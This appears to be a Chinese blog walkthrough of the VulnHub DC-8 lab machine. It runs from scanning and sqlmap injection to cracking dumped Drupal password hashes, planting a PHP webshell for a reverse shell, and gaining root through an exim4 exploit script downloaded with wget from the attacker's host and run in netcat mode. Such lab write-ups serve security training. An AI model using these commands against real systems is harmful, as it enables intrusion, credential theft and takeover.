vulnhub靶机:dc-8

一:信息收集

1:主机发现

arp-scan -I eth0 10.9.23.0/24

靶机ip

10.9.23.74

2:端口扫描

nmap -A -p- -T4 10.9.23.74

3:端口探测

4: 目录遍历

dirb http://10.9.23.74

http://10.9.23.74/robots.txt

发现有登录界面地址,访问一下:

/?q=user/login/

发现可能存在sql注入

二:渗透测试

1:漏洞利用

试试sql注入:

sqlmap -u "http://10.9.23.74/?nid=1" --batch

发现可以注入,查看下数据库:

sqlmap -u "http://10.9.23.74/?nid=1" -dbs --batch

爆出d7db数据库的表:

sqlmap -u "http://10.9.23.74/?nid=1" -D d7db --tables --batch

发现users表,爆出usesr表的列:

sqlmap -u "http://10.9.23.74/?nid=1" -D d7db -T users --columns --batch

发现name和pass,查看字段:

sqlmap -u "http://10.9.23.74/?nid=1" -D d7db -T users -C name,pass --dump --batch

发现两个用户,将两个pass字段放入john中进行破解:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

用户

admin

john

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

曝出密码

turtle

2:登录系统尝试反弹shell

john用户登录成功

这个界面可以写入php代码,添加一句话木马

成功反弹

三:提权

升级shell

python -c 'import pty;pty.spawn("/bin/bash")';

查看是否有特殊执行的文件

find / -perm -u=s -type f 2>/dev/null

查看exim4的版本:

/usr/sbin/exim4 --version

查找exim4的漏洞:

发现和dc4提权的步骤一样

存在本地提权

发现46996.sh脚本可以提权,将其发送到DC-8中

开启80端口

python3 -m http.server 80

wget http://10.9.23.112/46996.sh

文件结束符有错误,将其替换并进行提权:

sed -i -e 's/\r$//' 46996.sh

./46996.sh -m netcat

靶机结束

  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值